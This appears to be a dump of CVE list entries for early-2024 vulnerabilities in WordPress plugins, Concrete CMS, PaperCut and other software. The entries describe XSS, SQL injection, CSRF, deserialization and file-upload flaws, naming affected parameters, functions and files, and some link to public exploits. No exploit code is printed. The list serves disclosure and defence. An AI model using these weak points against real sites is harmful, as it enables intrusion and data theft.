CVE 2024 1246 Candidate Concrete CMS in version 9 before 9.2.5 is vulnerable to reflected XSS via the Image URL Import Feature due to insufficient validation of administrator provided data. A rogue administrator could inject malicious code when importing images, leading to the execution of the malicious code on the website user’s browser. The Concrete CMS Security team scored this 2 with CVSS v3 vector AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N. This does not affect Concrete versions prior to version 9. MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes | URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes | MISC:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory | URL:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory Assigned (20240206)
CVE 2024 1245 Candidate Concrete CMS version 9 before 9.2.5 is vulnerable to stored XSS in file tags and description attributes since administrator entered file attributes are not sufficiently sanitized in the Edit Attributes page. A rogue administrator could put malicious code into the file tags or description attributes and, when another administrator opens the same file for editing, the malicious code could execute. The Concrete CMS Security team scored this 2.4 with CVSS v3 vector AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N. MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes | URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes | MISC:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory | URL:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory Assigned (20240206)
CVE 2024 1242 Candidate The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button onclick attribute in all versions up to, and including, 4.10.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve Assigned (20240205)
CVE 2024 1239 Candidate The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blog post read more button in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve Assigned (20240205)
CVE 2024 1237 Candidate The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the flyout_layout attribute in all versions up to, and including, 1.6.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.24/inc/widgets-manager/widgets/class-navigation-menu.php#L1951 | URL:https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.24/inc/widgets-manager/widgets/class-navigation-menu.php#L1951 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/82644c46-205b-4005-bba8-6b3e45769639?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/82644c46-205b-4005-bba8-6b3e45769639?source=cve Assigned (20240205)
CVE 2024 1236 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Filterable Controls label icon parameter in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3259 | URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3259 | MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3261 | URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3261 | MISC:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php | URL:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve Assigned (20240205)
CVE 2024 1235 Candidate The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom class field in all versions up to, and including, 8.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/device-slider/loop.php#L33 | URL:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/device-slider/loop.php#L33 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve Assigned (20240205)
CVE 2024 1234 Candidate The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve Assigned (20240205)
CVE 2024 1232 Candidate The CM Download Manager WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete downloads via a CSRF attack MISC:https://wpscan.com/vulnerability/2a29b509-4cd5-43c8-84f4-f86251dd28f8/ | URL:https://wpscan.com/vulnerability/2a29b509-4cd5-43c8-84f4-f86251dd28f8/ Assigned (20240205)
CVE 2024 1231 Candidate The CM Download Manager WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins unpublish downloads via a CSRF attack MISC:https://wpscan.com/vulnerability/7d3968d9-61ed-4c00-8764-0360cf03255e/ | URL:https://wpscan.com/vulnerability/7d3968d9-61ed-4c00-8764-0360cf03255e/ Assigned (20240205)
CVE 2024 1227 Candidate An open redirect vulnerability, the exploitation of which could allow an attacker to create a custom URL and redirect a legitimate page to a malicious site. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server Assigned (20240205)
CVE 2024 1226 Candidate The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers. The inclusion of invalidated data in an HTTP header allows an attacker to specify the full HTTP response represented by the browser. An attacker could control the response and craft attacks such as cross-site scripting and cache poisoning attacks. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server Assigned (20240205)
CVE 2024 1225 Candidate A vulnerability classified as critical was found in QiboSoft QiboCMS X1 up to 1.0.6. Affected by this vulnerability is the function rmb_pay of the file /application/index/controller/Pay.php. The manipulation of the argument callback_class leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/jDWk6INLzO12 | URL:https://note.zhaoj.in/share/jDWk6INLzO12 | MISC:https://vuldb.com/?ctiid.252847 | URL:https://vuldb.com/?ctiid.252847 | MISC:https://vuldb.com/?id.252847 | URL:https://vuldb.com/?id.252847 Assigned (20240205)
CVE 2024 1224 Candidate This vulnerability exists in USB Pratirodh due to the usage of a weaker cryptographic algorithm (hash) SHA1 in user login component. A local attacker with administrative privileges could exploit this vulnerability to obtain the password of USB Pratirodh on the targeted system. Successful exploitation of this vulnerability could allow the attacker to take control of the application and modify the access control of registered users or devices on the targeted system. MISC:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0080 | URL:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0080 Assigned (20240205)
CVE 2024 1223 Candidate This vulnerability potentially allows unauthorized enumeration of information from the embedded device APIs. An attacker must already have existing knowledge of some combination of valid usernames, device names and an internal system key. For such an attack to be successful the system must be in a specific runtime state. MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 | URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 Assigned (20240205)
CVE 2024 1222 Candidate This allows attackers to use a maliciously formed API request to gain access to an API authorization level with elevated privileges. This applies to a small subset of PaperCut NG/MF API calls. MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 | URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 Assigned (20240205)
CVE 2024 1221 Candidate This vulnerability potentially allows files on a PaperCut NG/MF server to be exposed using a specifically formed payload against the impacted API endpoint. The attacker must carry out some reconnaissance to gain knowledge of a system token. This CVE only affects Linux and macOS PaperCut NG/MF servers. MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 | URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 Assigned (20240205)
CVE 2024 1220 Candidate A stack-based buffer overflow in the built-in web server in Moxa NPort W2150A/W2250A Series firmware version 2.3 and prior allows a remote attacker to exploit the vulnerability by sending crafted payload to the web service. Successful exploitation of the vulnerability could result in denial of service. MISC:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-238975-nport-w2150a-w2250a-series-web-server-stack-based-buffer-overflow-vulnerability | URL:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-238975-nport-w2150a-w2250a-series-web-server-stack-based-buffer-overflow-vulnerability Assigned (20240205)
CVE 2024 1218 Candidate The Contact Form builder with drag & drop for WordPress – Kali Forms plugin for WordPress is vulnerable to unauthorized access and modification of data via API due to an inconsistent capability check on several REST endpoints in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with contributor access and higher, to obtain access to or modify forms or entries. MISC:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk | URL:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve Assigned (20240202)
CVE 2024 1217 Candidate The Contact Form builder with drag & drop for WordPress – Kali Forms plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the await_plugin_deactivation function in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with subscriber access or higher, to deactivate any active plugins. MISC:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk | URL:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve Assigned (20240202)
CVE 2024 1215 Candidate A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file fetch_data.php. The manipulation of the argument username/city leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252782 is the identifier assigned to this vulnerability. MISC:https://github.com/PrecursorYork/crud-without-refresh-reload-Reflected_XSS-POC/blob/main/README.md | URL:https://github.com/PrecursorYork/crud-without-refresh-reload-Reflected_XSS-POC/blob/main/README.md | MISC:https://vuldb.com/?ctiid.252782 | URL:https://vuldb.com/?ctiid.252782 | MISC:https://vuldb.com/?id.252782 | URL:https://vuldb.com/?id.252782 Assigned (20240202)
CVE 2024 1214 Candidate The Easy Social Feed – Social Photos Gallery – Post Feed – Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the save_groups_list function. This makes it possible for unauthenticated attackers to disconnect a site's facebook or instagram page/group connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/trunk/facebook/admin/class-easy-facebook-likebox-admin.php?rev=3047064 | URL:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/trunk/facebook/admin/class-easy-facebook-likebox-admin.php?rev=3047064 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve Assigned (20240202)
CVE 2024 1213 Candidate The Easy Social Feed – Social Photos Gallery – Post Feed – Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the esf_insta_save_access_token and efbl_save_facebook_access_token functions. This makes it possible for unauthenticated attackers to connect their facebook and instagram pages to the site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve Assigned (20240202)
CVE 2024 1212 Candidate Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution. MISC:https://freeloadbalancer.com/ | URL:https://freeloadbalancer.com/ | MISC:https://kemptechnologies.com/ | URL:https://kemptechnologies.com/ | MISC:https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 | URL:https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 | MISC:https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 | URL:https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 Assigned (20240202)
CVE 2024 1210 Candidate The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes. MISC:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 | URL:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 | MISC:https://www.learndash.com/release-notes/ | URL:https://www.learndash.com/release-notes/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve Assigned (20240202)
CVE 2024 1209 Candidate The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads. MISC:https://github.com/karlemilnikka/CVE-2024-1209 | URL:https://github.com/karlemilnikka/CVE-2024-1209 | MISC:https://www.learndash.com/release-notes/ | URL:https://www.learndash.com/release-notes/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve Assigned (20240202)
CVE 2024 1208 Candidate The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions. MISC:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 | URL:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 | MISC:https://www.learndash.com/release-notes/ | URL:https://www.learndash.com/release-notes/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve Assigned (20240202)
CVE 2024 1207 Candidate The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve Assigned (20240202)
CVE 2024 1206 Candidate The WP Recipe Maker plugin for WordPress is vulnerable to SQL Injection via the 'recipes' parameter in all versions up to, and including, 9.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/class-wprm-import-manager.php | URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/class-wprm-import-manager.php | MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-mealplannerpro.php | URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-mealplannerpro.php | MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-recipecard.php | URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-recipecard.php | MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoom.php | URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoom.php | MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoomcpt.php | URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoomcpt.php | MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-yummly.php | URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-yummly.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b10d8f8a-517f-4286-b501-0ca040529362?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b10d8f8a-517f-4286-b501-0ca040529362?source=cve Assigned (20240202)
CVE 2024 1205 Candidate The Management App for WooCommerce – Order notifications, Order management, Lead management, Uptime Monitoring plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the nouvello_upload_csv_file function in all versions up to, and including, 1.2.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. MISC:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982 | URL:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982 | MISC:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166 | URL:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve Assigned (20240202)
CVE 2024 1203 Candidate The Conversios – Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'valueData' parameter in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1850 | URL:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1850 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve Assigned (20240202)
CVE 2024 1202 Candidate Authentication Bypass by Primary Weakness vulnerability in XPodas Octopod allows Authentication Bypass.This issue affects Octopod: before v1. NOTE: The vendor was contacted and it was learned that the product is not supported. MISC:https://www.usom.gov.tr/bildirim/tr-24-0174 | URL:https://www.usom.gov.tr/bildirim/tr-24-0174 Assigned (20240202)
CVE 2024 1201 Candidate Search path or unquoted item vulnerability in HDD Health affecting versions 4.2.0.112 and earlier. This vulnerability could allow a local attacker to store a malicious executable file within the unquoted search path, resulting in privilege escalation. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/panterasoft-hdd-health-search-path-or-unquoted-item-vulnerability | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/panterasoft-hdd-health-search-path-or-unquoted-item-vulnerability Assigned (20240202)
CVE 2024 1200 Candidate A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /template/1/default/. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252698 is the identifier assigned to this vulnerability. MISC:https://github.com/sweatxi/BugHub/blob/main/Nanchang%20Lanzhi%20Technology%20Co.pdf | URL:https://github.com/sweatxi/BugHub/blob/main/Nanchang%20Lanzhi%20Technology%20Co.pdf | MISC:https://vuldb.com/?ctiid.252698 | URL:https://vuldb.com/?ctiid.252698 | MISC:https://vuldb.com/?id.252698 | URL:https://vuldb.com/?id.252698 Assigned (20240202)
CVE 2024 1199 Candidate A vulnerability has been found in CodeAstro Employee Task Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file \employee-tasks-php\attendance-info.php. The manipulation of the argument aten_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252697 was assigned to this vulnerability. MISC:https://docs.qq.com/doc/DYnhIWEdkZXViTXdD | URL:https://docs.qq.com/doc/DYnhIWEdkZXViTXdD | MISC:https://vuldb.com/?ctiid.252697 | URL:https://vuldb.com/?ctiid.252697 | MISC:https://vuldb.com/?id.252697 | URL:https://vuldb.com/?id.252697 Assigned (20240202)
CVE 2024 1198 Candidate A vulnerability, which was classified as critical, was found in openBI up to 6.0.3. Affected is the function addxinzhi of the file application/controllers/User.php of the component Phar Handler. The manipulation of the argument outimgurl leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252696. MISC:https://note.zhaoj.in/share/qFXZZfp1NLa3 | URL:https://note.zhaoj.in/share/qFXZZfp1NLa3 | MISC:https://vuldb.com/?ctiid.252696 | URL:https://vuldb.com/?ctiid.252696 | MISC:https://vuldb.com/?id.252696 | URL:https://vuldb.com/?id.252696 Assigned (20240202)
CVE 2024 1197 Candidate A vulnerability, which was classified as critical, has been found in SourceCodester Testimonial Page Manager 1.0. This issue affects some unknown processing of the file delete-testimonial.php of the component HTTP GET Request Handler. The manipulation of the argument testimony leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-252695. MISC:https://vuldb.com/?ctiid.252695 | URL:https://vuldb.com/?ctiid.252695 | MISC:https://vuldb.com/?id.252695 | URL:https://vuldb.com/?id.252695 Assigned (20240202)
CVE 2024 1196 Candidate A vulnerability classified as problematic was found in SourceCodester Testimonial Page Manager 1.0. This vulnerability affects unknown code of the file add-testimonial.php of the component HTTP POST Request Handler. The manipulation of the argument name/description/testimony leads to cross site scripting. The attack can be initiated remotely. VDB-252694 is the identifier assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252694 | URL:https://vuldb.com/?ctiid.252694 | MISC:https://vuldb.com/?id.252694 | URL:https://vuldb.com/?id.252694 Assigned (20240202)
CVE 2024 1195 Candidate A vulnerability classified as critical was found in iTop VPN up to 4.0.0.1. Affected by this vulnerability is an unknown functionality in the library ITopVpnCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The identifier VDB-252685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.252685 | URL:https://vuldb.com/?ctiid.252685 | MISC:https://vuldb.com/?id.252685 | URL:https://vuldb.com/?id.252685 | MISC:https://www.youtube.com/watch?v=JdQMINPVJd8 | URL:https://www.youtube.com/watch?v=JdQMINPVJd8 Assigned (20240202)
CVE 2024 1194 Candidate A vulnerability classified as problematic has been found in Armcode AlienIP 2.41. Affected is an unknown function of the component Locate Host Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/25-exploit-perl.txt | URL:https://fitoxs.com/vuldb/25-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252684 | URL:https://vuldb.com/?ctiid.252684 | MISC:https://vuldb.com/?id.252684 | URL:https://vuldb.com/?id.252684 Assigned (20240202)
